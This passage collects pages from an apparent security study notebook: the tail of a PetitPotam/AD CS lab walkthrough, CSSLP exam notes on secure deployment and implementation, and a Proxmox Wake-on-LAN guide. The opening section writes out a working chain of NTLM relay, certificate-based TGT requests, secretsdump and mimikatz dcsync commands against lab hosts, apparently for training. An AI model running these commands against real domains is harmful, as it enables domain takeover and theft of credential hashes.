(LSARPC) by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC). This technique allows an unauthenticated attacker to take over a Windows domain where Active Directory Certificate Services (AD CS) is in use. ### [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#method-1-linux) Method 1 (Linux) Copy # Setup NTLM Relay sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController # Run Python Script python3 PetitPotam.py 172.16.5.225 172.16.5.5\ # Request TGT python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 # Setup ccache export KRB5CCNAME=dc01.ccache # Dump Hashes secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL # Or Request TGS python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$ ### [](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#method-2-windows) Method 2 (Windows) [PreviousDomain Trust Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration) [NextPost-Exploitation](https://martian1337.gitbook.io/notes/notes/network-security/privileged-access) Last updated 1 year ago * [NoPac (SamAccountName Spoofing)](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#nopac-samaccountname-spoofing) * [Getting Shell](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#getting-shell) * [DCSync Attack](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#dcsync-attack) * [PetitPotom](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#petitpotom) * [Method 1 (Linux)](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#method-1-linux) * [Method 2 (Windows)](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities#method-2-windows) Copy # Rubeus TGT .\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate: /nowrap # DCsync lsadump::dcsync /user:inlanefreight\krbtgt --- # Domain 7: Secure Software Deployment, Operations, Maintenance | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance.md) . [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance#secure-operations-and-maintenance) Secure Operations and Maintenance ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- If an organization suffers a security incident, a quick, correct response is essential to minimizing the cost and damage to the business and requires a well-defined incident response plan. After a potential incident has been identified (based on monitoring and threat detection), essential activities include: * **Root Cause Analysis:** Often, the events that cause an incident to be detected are symptoms, and addressing these will not solve the problem. Root cause analysis is necessary to identify why the incident occurred and ensure that it does not recur in the future. * **Incident Triage:** An organization may face many simultaneous incidents with varying levels of importance and impact on the organization. Triage ensures that incident investigation and response activities are properly prioritized and that each incident is managed at the appropriate level (i.e., not disabling critical functionality due to a minor bug). * **Forensics:** Digital forensics involves investigating an incident to support remediation, recovery, regulatory compliance, or legal action. Often, this involves analyzing log files, the file system, the Windows Registry, and other data sources. When a business is maintaining continuity of operations, it has suffered a business-disrupting event and is attempting to continue functioning until it restores to normal operations. Business continuity planning includes identifying the criticality of applications to the business to prioritize their restoration. Some concepts related to business continuity/disaster recovery include: * **Backup, Archiving, and Retention:** If data is corrupted or destroyed during a security incident, backups are essential to restoring operations. These backups should be appropriately protected with encryption and access controls. * **Disaster Recovery (DR):** Disaster recovery is the process of moving from continuity operations during an incident back to normal operations. This requires careful planning and full knowledge of system dependencies to ensure that applications are brought back online only when they have the resources needed to operate. * **Resiliency:** Resiliency measures how well a system can survive a disruptive incident. Redundant systems and additional copies of vital data are examples of measures to boost resiliency. Information Security Continuous Monitoring (ISCM) is the practice of continually monitoring an organization’s security threats, vulnerabilities, and security posture. Elements of ISCM include: * **Collect and Analyze Security Observable Data:** Security intelligence can come from log data, network traffic, events, and similar sources. Tools such as a Security Information and Event Management (SIEM) solution can help with collecting, processing, storing, and accessing this data. * **Threat Intel:** Threat intelligence is information about the risk that a company faces, such as new vulnerabilities, active attack campaigns, etc. This information can be used to help plan defenses and tune security solutions and application configurations. * **Intrusion Detection and Response:** Intrusion detection is the process of identifying potential threats to the organization based on known-malicious actions, anomalous activities, and other signifiers. Once a potential threat is identified, it can be investigated and managed by the security team. * **Secure Configuration:** The configuration of an application can impact its vulnerability to attack. Configurations should be implemented in line with best practice and monitored for unauthorized changes. * **Regulation Changes:** Corporate security and AppSec policies are often driven at least partly by external regulations. As regulatory requirements evolve, organizations need to monitor these changes and make appropriate policy updates. If an organization suffers a security incident, a quick, correct response is essential to minimizing the cost and damage to the business and requires a well-defined incident response plan. After a potential incident has been identified (based on monitoring and threat detection), essential activities include: * **Root Cause Analysis:** Often, the events that cause an incident to be detected are symptoms, and addressing these will not solve the problem. Root cause analysis is necessary to identify why the incident occurred and ensure that it does not recur in the future. * **Incident Triage:** An organization may face many simultaneous incidents with varying levels of importance and impact on the organization. Triage ensures that incident investigation and response activities are properly prioritized and that each incident is managed at the appropriate level (i.e., not disabling critical functionality due to a minor bug). * **Forensics:** Digital forensics involves investigating an incident to support remediation, recovery, regulatory compliance, or legal action. Often, this involves analyzing log files, the file system, the Windows Registry, and other data sources. Service level agreements (SLAs) define the minimum guaranteed level of service that a customer can expect from a service provider. These include a set of Service Level Objectives (SLOs) that define particular goals, such as maintenance, performance, service availability, or available personnel, and that have clear metrics for evaluating whether they have been met. If the SLOs and SLA are violated, then the service provider is legally liable. Not all vulnerabilities are identified and fixed before applications reach production. Runtime protection systems help to mitigate this issue by protecting vulnerable applications against attempted exploitation or reducing the probability of a successful attack. Some examples include: * **Runtime Application Self-Protection (RASP):** RASP solutions are integrated with a protected application and monitor its inputs, output, and behavior for anomalies that could indicate a potential attack. * **Web Application Firewall (WAF):** A WAF sits between an application and the Internet and filters out traffic containing known exploits before it reaches the vulnerable application. * **Address Space Layout Randomization (ASLR):** ASLR randomizes the location of certain functions in memory, making it more difficult for an attacker to use these functions when exploiting a vulnerability. Vulnerability management is the process of addressing the various vulnerabilities that may exist in an organization’s systems. Key components of vulnerability management include: * **Scanning:** Vulnerability scanning is a common way of identifying vulnerabilities. A vulnerability scanner identifies known vulnerabilities for running applications (based on CVEs) and common, unknown vulnerabilities (SQL injection, buffer overflow, etc.) in applications. * **Tracking:** After a vulnerability has been identified, it should be added to a bug tracking system. This helps with prioritizing vulnerability remediation and ensuring that it is addressed. * **Triaging:** Most organizations have more vulnerabilities than they can effectively remediate. Triage ensures that the most dangerous vulnerabilities are addressed first, reducing risk to the organization. * **Patching:** Vulnerabilities are corrected by applying patches. This includes finding, testing, and applying updates based on the priority order. Patch management is the practice of applying updates to fix security and functionality issues. Key elements of patch management are ensuring that update code is secured against malicious modification and testing patches to ensure that they fix the issue and don’t break anything else (regression testing). * Dynamic Application Security Testing (DAST) is performed during the development process and involves sending malicious or malformed inputs to an application and monitoring its responses. * A hotfix or quick fix engineering (QFE) is a patch designed to fix a particular problem, often without adding any additional functionality. * A Service Pack bundles multiple hotfixes together and may also include new functionality. \\ [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance#secure-deployment) Secure Deployment ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- Standard principles of system design include: * Abstraction * Modularity * Information hiding Abstract modeling techniques include * Continuous system modeling * Agent-based modeling * Unified Modeling Language (UML) Bootstrapping is the process by which an application loads itself into memory and begins execution. Important components of bootstrapping include: * Setting default configuration values * Verifying the correct operation of security features * Connecting to the key management, access control, and other security management systems Risk assessments should be based on three factors: * Relationships between system assets * Threats to each asset * Business and technological risks associated with each threat Software development teams must securely store and manage various types of security data. Examples include: * **Credentials:** Credentials manage access to code, development environments, and tools. Credentials should be defined based on the principle of least privilege, and each account/environment should have its own credentials. * **Secrets:** Applications may have access to encryption and API keys, user credentials, and other sensitive data. This information should be protected using access controls, encryption, and other data security best practices. * **Keys/Certificates:** Encryption keys and digital certificates should be properly managed. For example, keys should not be hardcoded into application code, and digital certificates should be verified before being trusted/used. * **Configurations:** An application’s configuration has a significant impact on its security. Application configuration information should be protected by access controls and integrity and authenticity checks. The three main groups that personnel training should be designed for include: * **Administrators:** Define system and user configurations * **Power Users:** Are the go-to person for users with questions and need correct answers * **Standard Users:** Need to know how to do their jobs on the system * * * * Continuous integration involves making frequent, small changes to the codebase, and testing each one before accepting it. * Continuous delivery automates the processing of testing small releases and rolling them out to production. * Continuous deployment uses automated scripts to roll updates out to customers. * Post-deployment testing can help to ensure that software continues to work after being delivered to the customer. Common examples include validating that updates are correct and properly installed and generating logs of significant events for debugging and regulatory compliance. * System-of-systems integration is primarily focused on ensuring concurrent interoperability. * Threat modeling identifies the potential risks faced by software, which can then be prioritized during risk assessment. * A threat picture describes known vulnerabilities at a particular point in time. * Most software needs to make changes to its environment to run, such as registering credentials with a credential management system, allowlisting application files with the antivirus, and network configuration. All of these requirements should be documented to ensure that they are correctly set up and that these changes persist. * Information Security Continuous Monitoring (ISCM) is the practice of continually monitoring an organization’s security threats, vulnerabilities, and security posture. * Security Information and Event Management (SIEM) solutions aggregate and analyze security data from multiple sources. * Build artifact verification is the process of ensuring the integrity and authenticity of the products developed during the build process. Common integrity verification techniques include checksums, hashes, and digital signatures. [PreviousDomain 6: Secure Software Testing](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-6-secure-software-testing) [NextDomain 8: Secure Software Supply Chain](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-8-secure-software-supply-chain) Last updated 10 months ago * [Secure Operations and Maintenance](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance#secure-operations-and-maintenance) * [Secure Deployment](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-7-secure-software-deployment-operations-maintenance#secure-deployment) --- # Enable and test Wake-on-LAN (WOL) | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol.md) . ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#enable-wake-on-lan-in-biosuefi) Enable Wake-on-LAN in BIOS/UEFI * Reboot the server and enter BIOS/UEFI (usually Delete, F2, F10, or F12 during boot). * Locate the "Wake-on-LAN," “Power On by PCI-E,” or similar option in the power management section. * Set this option to “Enabled.” * Save changes and exit BIOS. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#obtain-the-mac-address-of-your-proxmox-server) Obtain the MAC Address of Your Proxmox Server 1. Access the Proxmox shell via the web interface or SSH. 2. Run: Copy ip addr 3. Find the active Ethernet interface associated with your LAN and note its MAC address (displayed after `link/ether`). For example: Copy 2: eno1: link/ether 18:7d:23:fa:87:02 brd ff:ff:ff:ff:ff:ff The MAC address above is `18:7d:23:fa:87:02` — write down your actual MAC for later use. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#configure-wol-support-in-proxmoxlinux) Configure WOL Support in Proxmox/Linux 1. **Install ethtool:** Copy textapt update apt install ethtool 2. **Check Network Interface WOL Support:** Copy ethtool eno1 Replace `eno1` with your actual interface. Look for `Supports Wake-on: g` and `Wake-on: d` or `Wake-on: g`. * If it lists `Wake-on: d`, WOL is currently **disabled**. * If it lists `Wake-on: g`, WOL is **enabled**. 3. **Enable Wake-on-LAN:** Copy ethtool -s eno1 wol g This turns on WOL until the next reboot. 4. **Make WOL Setting Persistent:** Edit `/etc/network/interfaces`: Copy nano /etc/network/interfaces Under the correct `iface` line for your interface, add: Copy post-up /usr/sbin/ethtool -s eno1 wol g A sample configuration: Copy auto eno1 iface eno1 inet static address 192.168.1.10 netmask 255.255.255.0 gateway 192.168.1.1 post-up /usr/sbin/ethtool -s eno1 wol g Save and exit the file. This command ensures that WOL is always enabled after a reboot. 5. **Reload Network Settings in Proxmox GUI (Optional):** * Navigate to Node > System > Network. * Select your interface and click “Edit.” * Add the Autostart flag, then save. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#shutdown-and-prepare-for-testing) Shutdown and Prepare for Testing 1. Fully power off (shutdown) the Proxmox server. 2. Confirm that the network interface LEDs remain active or blinking—this typically indicates WOL hardware is ready. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#sending-a-magic-packet-from-windows) Sending a magic packet from linux **Option 1: Python (wol.py)** **Option 2: Install Wake on Lan tools** **RedHat Distros** **Debian** ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#sending-a-magic-packet-from-windows-1) Sending a Magic Packet from Windows **Option 1: Using a Free Utility (WakeMeOnLan by NirSoft)** 1. Download and extract WakeMeOnLan from NirSoft’s website. 2. Run the application and click “Add New Computer.” 3. Enter your Proxmox server’s MAC address and (optionally) its IP or broadcast address. Save the entry. 4. Select the entry and click “Wake Up Selected Computers” to send the magic packet.[nirsoft](https://www.nirsoft.net/utils/wake_on_lan.html) **Option 2: Using Windows PowerShell** 1. Open Notepad and paste the following (replace MAC and broadcast address with your own): 2. Save as `wol.ps1`. 3. Right-click and run with PowerShell (script execution policy may need adjustment).[pdq](https://www.pdq.com/blog/wake-on-lan-wol-magic-packet-powershell/) ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#confirming-wol-functionality) Confirming WOL Functionality * After sending the packet, the Proxmox server should power on if all settings are correct. * Upon startup, recheck WOL status with: Verify that `Wake-on: g` remains set. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#troubleshooting-notes) Troubleshooting Notes * Ensure wired Ethernet is used (many WiFi chipsets do not support WOL). * If WOL does not persist after reboot, double-check `/etc/network/interfaces` for your `post-up` line. * Some motherboards may require WiFi to be disabled for WOL to work, so test with and without WiFi enabled if you encounter issues. [PreviousProxmox Update Setup Guide](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/proxmox-update-setup-guide) [NextRemotely Unlocking LUKS-Encrypted Proxmox with Dropbear SSH at Boot](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/remotely-unlocking-luks-encrypted-proxmox-with-dropbear-ssh-at-boot) Last updated 10 months ago * [Enable Wake-on-LAN in BIOS/UEFI](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#enable-wake-on-lan-in-biosuefi) * [Obtain the MAC Address of Your Proxmox Server](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#obtain-the-mac-address-of-your-proxmox-server) * [Configure WOL Support in Proxmox/Linux](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#configure-wol-support-in-proxmoxlinux) * [Shutdown and Prepare for Testing](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#shutdown-and-prepare-for-testing) * [Sending a magic packet from linux](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#sending-a-magic-packet-from-windows) * [Sending a Magic Packet from Windows](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#sending-a-magic-packet-from-windows-1) * [Confirming WOL Functionality](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#confirming-wol-functionality) * [Troubleshooting Notes](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/proxmox-ve/enable-and-test-wake-on-lan-wol#troubleshooting-notes) Copy import socket mac = '1A:2B:3C:4D:5E:6F' # Modify Mac address mac_bytes = bytes.fromhex(mac.replace(':','')) packet = b'\xFF'*6 + mac_bytes*16 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) sock.sendto(packet, ('', 9)) # Port 9 is common for WOL sock.close() Copy sudo dnf install wol -y Copy sudo dnf install etherwake -y Copy sudo apt install wakeonlan -y Copy $mac="1A:2B:3C:4D:5E:6F" $broadcast="192.168.1.255" $port=9 $addr=([System.Net.IPAddress])$broadcast $udp=[System.Net.Sockets.UdpClient]::new() $packet = ([byte[]](,0xFF * 6 + (($mac -split "[:-]") | % { [byte]("0x$_") }) * 16)) $udp.Send($packet, $packet.Length, $broadcast, $port) $udp.Close() Copy ethtool eno1 --- # Domain 5: Secure Software Implementation | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation.md) . [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#defensive-coding-techniques-and-secure-design-principles) Defensive Coding Techniques and Secure Design Principles ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- The four **main risk management strategies** are: * **Remediation:** Fix the underlying issue to eliminate the risk. This is the preferred and most effective solution. * **Mitigation:** Implement security controls that reduce the risk; however, some residual risk may remain. * **Transference:** Transferring responsibility for the risk to another party, such as the user, an insurance provider, etc. * **Acceptance:** Doing nothing and accepting the results of the risk if it occurs Declarative security is a container-based approach that defines the “what” of security and leaves the “how” to the operations team. This results in more flexible security that is tailored to the deployment environment. Imperative security defines the “how” of security. This provides more granular security management and is better suited to implementing complex business rules. However, it is less portable and reusable. Type safety refers to a programming language’s ability to avoid errors caused by the use of different types of variables in an application. For example, type-safe code encodes the lengths of variables, preventing accidental access of data outside of the bounds of a variable. Locality refers to the fact that references close together in code are also often close together in memory. Buffer overflows are an example of an exploit that takes advantage of this fact. Bootstrapping is the process by which a computer or application starts up based on the knowledge of where startup scripts, etc. are located. It is potentially vulnerable to malicious scripts or modifications to configuration files. Cryptographic agility refers to the ability to swap out cryptographic code as needed if a particular algorithm is broken. The goal is to avoid rewriting or recompiling code, and the process often relies on configuration files that specify the cryptographic library functions to use. The **/SAFEH** switch supports safe exception handling. The **/GS compiler flag** can protect against some stack overflow attacks. **System-of-systems integration** involves integrating multiple systems into a single, functioning whole. **Trust contracts** define trust requirements for any data crossing a trust boundary. **Error handling** is how an application responds when something unexpected occurs. **Exception management** is writing code to implement error handling. **Defense in depth** involves using multiple security controls together to provide protection even if one fails. Some examples include: * **Injection Protection:** Input validation, output encoding, and prepared statements are all protections against various injection attacks. Combining two or more further decreases the probability of a successful output. * **XSS Protection:** Cross-site scripting involves injecting malicious scripts into a webpage. Blocking active scripts, encoding outputs, and validating input can strengthen XSS protections. * **Security Zones:** Security zones segment networks, software, etc. based on access controls. Security solutions deployed on zone boundaries have another chance to identify a threat before it causes harm to the organization. The principle of economy of mechanism states that software should be designed to be as simple as possible, making it easier to understand and reducing its attack surface. This is accomplished by: * **Removing Unnecessary Functionality:** Additional "bells and whistles" features may improve the user experience, but they also create more opportunities for security flaws or bugs * **Keeping Security Simple:** Security controls should be as simple as possible to ensure complete operation and minimize the chance of bugs * **Ease of Use:** Secure Sign On (SSO) and similar enhancements to the user experience reduce the probability that a user will try to bypass security mechanisms and eliminate high-risk authentication code The **principle of least privilege** states that users, software, etc. should only have the access and permissions needed to do their jobs. Some means of enforcing least privilege include: * **Modular Programming:** Modular programming involves breaking an application into many pieces, each with a unique, simple purpose. Modularity makes software easier to troubleshoot and maintain and can enforce least privilege since each module has limited access and permissions. * **Non-Admin Accounts:** Some users will need to perform privileged actions, which require privileged accounts. However, these privileged accounts should only be used when needed, with less privileged accounts used for all other actions. Split keys and role separation are security controls for separation of duties. Account logouts help software to fail to a secure state. Separation of duties focuses on breaking privileged actions into multiple steps that must be performed by different parties. Security controls associated with separation of duties include: * **Split Keys:** Dividing an encryption key across multiple locations prevents a single compromised system or account from leaking sensitive data. * **Role Separation:** During the development process, a programmer should not be part of the testing and quality assurance team responsible for reviewing their own code. Software that fails secure defaults to a secure state in the event of an issue but can be easily restored to normal operations. Design mechanisms that support this include: * **Default Deny:** Access requests to corporate resources should be denied by default until a user or application demonstrates the necessary permissions. * **Account Lockouts:** After a certain number of failed access attempts, a user account should be locked to protect against brute force attacks. * **Error Handling:** Software should be designed to explicitly handle errors and not produce overly verbose error messages that reveal the internal workings of the application. Complete mediation requires that access controls be applied every time, even to follow-on requests within a session. Related security controls include: * **Code Path Analysis:** During the design phase, all code paths that require elevated permissions or sensitive data should be identified. These code paths should all pass through a single interface that applies access controls and other policy enforcement. Removing unnecessary functionality and ease of use are related to economy of mechanism. Error handling is related to failing securely. **Anti-tampering solutions** are designed to protect software against malicious modifications. Some common techniques include: * **Code Signing:** Valid digital signatures can only be created with knowledge of the appropriate private key. Signing the application's code ensures that it is authentic and has not been modified since the signature was generated. * **Version Control/Revision Control:** Version control systems (like git) record every change to software. These systems allow comments to be applied to commits, limitations on who can commit, comparisons between versions, and reversion to a previous version of a file or release. * **Obfuscation:** Code obfuscation is designed to make production code more difficult to decompile and understand. Obfuscation can help to protect against tampering because it makes it more difficult to determine where and how to change the code. Encryption is not a common anti-tampering solution because encrypted code can't be executed. Examples of **common cryptographic failures** include: * **Hard-Coded Credentials:** Authentication information (passwords, keys, etc.) hard-coded into an application is vulnerable to exposure and difficult to change. This creates failures in authentication and enables account takeover. * **Missing Encryption of Sensitive Data:** Certain types of sensitive data should be encrypted to protect the business and its customers and to comply with applicable regulations. Log files, error logs, and backups are common examples of locations where this issue occurs. * **Use of a Broken or Risky Cryptographic Algorithm:** DES, MD5, SHA-1, and other algorithms are considered broken and insecure. Using broken or custom encryption algorithms leaves data vulnerable to exposure. Additionally, the use of a weak random number generator (RNG) to generate keys is a common problem. * **Download of Code without Integrity Check:** Code downloaded from the Internet may be malicious or modified by an attacker. All downloaded code should be compared to the provided hash value or digital signature to ensure that it has not been tampered with. * **Unsalted Hash:** Hash functions always provide the same output for a given input. This can be problematic for password management since it reveals which accounts have the same password and makes it possible to use precomputed rainbow tables to crack weak passwords. Salting hashes by including a random value as part of the input ensures that identical passwords produce different hashes and protects against the use of rainbow tables. #### [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#password-attacks) Password Attacks Birthday attacks take advantage of the fact that it is much more probable that any two members of a group have a collision (i.e., the same birthday) than that a particular member of the group has a collision with another member. Dictionary attacks use a list of inputs (such as common passwords) to try to guess the input that produced a particular hash. Salting involves adding a random, public value to the input to a hash algorithm (such as a password) so that identical inputs (such as identical passwords) do not produce the same hash. Rainbow tables are precalculated lookup tables that map hash inputs to outputs and are designed to make future attacks faster. Salting can protect against rainbow attacks. * * * [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#software-security-analysis) Software Security Analysis ---------------------------------------------------------------------------------------------------------------------------------------------------------------------- A few different types of tools exist for software security analysis. These include: * **Static Application Security Testing (SAST):** SAST or static analysis tools analyze the source code of an application for vulnerabilities. Since they use source code, they can be applied earlier in the SDLC than other tools that require a running application. Additionally, they provide better test coverage and can pinpoint an error within an application’s code. However, SAST tools are language-specific and cannot identify some types of vulnerabilities that are only detectable in running code. * **Dynamic Application Security Testing (DAST):** DAST or dynamic analysis tools test a running application for vulnerabilities by sending it malicious or anomalous inputs and analyzing its behavior or responses. DAST can be cheaper than SAST, often has fewer false positives, and can identify issues that are only apparent at runtime. However, it has poorer code coverage, cannot pinpoint where an issue exists within the code (only that it does exist), and requires a running application (making it only usable later in the SDLC). * **Interactive Application Security Testing (IAST):** IAST solutions use instrumentation to gain internal visibility of a running application while running tests against it. IAST solutions can pinpoint vulnerabilities in an application and are more easily integrated into CI/CD pipelines. However, IAST can be more expensive, slows code execution, and is a less mature solution. * **Runtime Application Self-Protection (RASP):** RASP uses instrumentation to monitor and protect an application in production. Based on visibility into inputs, outputs, and application behavior, RASP can identify and block even zero-day attacks against an application. However, RASP does increase the size and complexity of the application that it protects. * **Software composition analysis (SCA):** provides visibility into the collection of third-party libraries and modules used by an application. This can help with vulnerability detection, license management, and similar functions. * * * [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#code-and-peer-reviews) Code and Peer Reviews ------------------------------------------------------------------------------------------------------------------------------------------------------------ **Code review** is a process by which other developers inspect code for security or efficiency issues. Some of the common checks performed during code review include: * **Inefficient Code:** Complex or obfuscated code may need to be simplified to improve analysis or execution. * **Known Vulnerabilities:** Code should be checked against the OWASP Top 10, SANS Top 25, and errors that have previously been found within an organization's code. * **Errors and Exception Handling:** Code should fully test for error cases and handle all possible exceptions. * **Injection Flaws:** Code should include input validation to protect against injection attacks. * **Cryptographic Strength:** Cryptography should be implemented using trusted algorithms and libraries and use strong random number generation. * **Unsafe and Deprecated Function Calls:** Code should only use approved functions and APIs, and unneeded functions should be removed. * **Privilege Levels:** Code should be implemented in accordance with the principle of least privilege. * **Logging:** Code should properly log errors without revealing unnecessary information. * **Secure Key Information:** Cryptographic keys, passwords, and other authentication information should be properly used and protected. Infinite loops can occur when unhandled states occur in conditional logic. For example, code designed to read until it finds a particular letter could read forever if presented with all-numeric input. Race condition vulnerabilities can occur if multiple threads of execution can read/write values at the same time. For example, two threads may update a value simultaneously, causing one update to overwrite the other. Mutual exclusion occurs when race condition protections cause thread deadlock. If thread A is waiting for thread B to perform action X before it performs action Y and thread B will only perform X if thread A performs Y, then neither can execute. Recursion is when a function within an application calls itself again. [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#common-vulnerabilities-and-controls) Common Vulnerabilities and Controls ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- The OWASP Top Ten is a list of some of the most common and impactful vulnerabilities in web applications. The SANS Top 25 Software errors lists some of the most common errors that affect software in general. The Common Weaknesses Enumeration (CWE), maintained by MITRE, classifies the various types of errors that can occur in software. The Common Vulnerabilities and Exposures (CVE) list, also maintained by MITRE, describes specific vulnerabilities that have been identified in a particular application. ### [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#vulnerabilities) Vulnerabilities **Injection** is a major, common vulnerability that usually features highly on vulnerability lists. Some common types of injection vulnerabilities include: * **SQL Injection:** SQL injection attacks involve providing malicious input that is included in a database request. SQL injection can read, write, or delete data contained within a database accessible to a vulnerable application. * **Command Injection:** Command injection vulnerabilities allow an attacker to run commands in the system terminal. For example, an application may run a command in the shell using user-provided input, which may be crafted to change the intent of the command or run additional commands. * **Integer Overflow:** Integers have a fixed size in memory and are only able to store a certain range of values. If a value to be stored in a variable exceeds this range, it wraps around and is interpreted as a smaller value. * **Path Traversal:** In a filepath, ../ indicates that the system should look in the next directory up in the file system. Path traversal vulnerabilities allow an attacker who can specify the name of a file to be read/written by an application to read/write files outside of the intended directory. * **Cross-Site Scripting (XSS):** Modern webpages use scripts to add interactivity and other functionality to webpages. If user-provided input is used as part of a webpage's HTML code, a malicious user can have part of their input interpreted as a script, which will be run in the browser of anyone visiting the page. Injection vulnerabilities can be non-persistent/reflected, persistent/reflected, or DOM-based. * **Cross-Site Request Forgery (CSRF):** Cross-site request forgery (CSRF) attacks involve tricking the browser of an authenticated user into performing an HTTP request without their knowledge/consent. For example, a user logged into social media could have their password changed if a malicious webpage tricked their browser into performing a password change request and the social media site lacked CSRF protections. \\ **Poor input validation** is the cause of many of the most common vulnerabilities. Some common errors include: * **Buffer Overflows:** Buffer overflow vulnerabilities occur when a program attempts to write more data to a memory location than fits in the allocated space. Buffer overflows can be exploited to overwrite critical data stored in memory or execute malicious code. * **Canonical Form:** Data can be encoded in various ways, such as URL or Base64 decoding, and software commonly converts it to canonical form before processing it. This makes it possible for an attacker to bypass input validation schemes that inspect the data before it is canonicalized. * **Missing Defense Functions:** User authentication and authorization functions help to control access to privileged functionality and sensitive data. If these defenses are missing or can be bypassed, it places application security at risk. * **Output Validation Failures:** The output from one function or application may be used as input by another. Application output should also be sanity-checked for errors that could cause problems down the line. ### [](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#controls) Controls File integrity monitoring (FIM) ensures that configuration files or other important data have not been tampered with before use via a hash value, checksum, or digital signature. Watchdogs check for a specific issue in an application. For example, time to live (TTL) values in packets protect against traffic endlessly looping through the network. [PreviousDomain 4: Secure Software Architecture and Design](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-4-secure-software-architecture-and-design) [NextDomain 6: Secure Software Testing](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-6-secure-software-testing) Last updated 1 year ago * [Defensive Coding Techniques and Secure Design Principles](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#defensive-coding-techniques-and-secure-design-principles) * [Software Security Analysis](https://martian1337.gitbook.io/notes/notes/certifications/csslp/domain-5-secure-software-implementation#software-security-analysis) * [Code and Peer 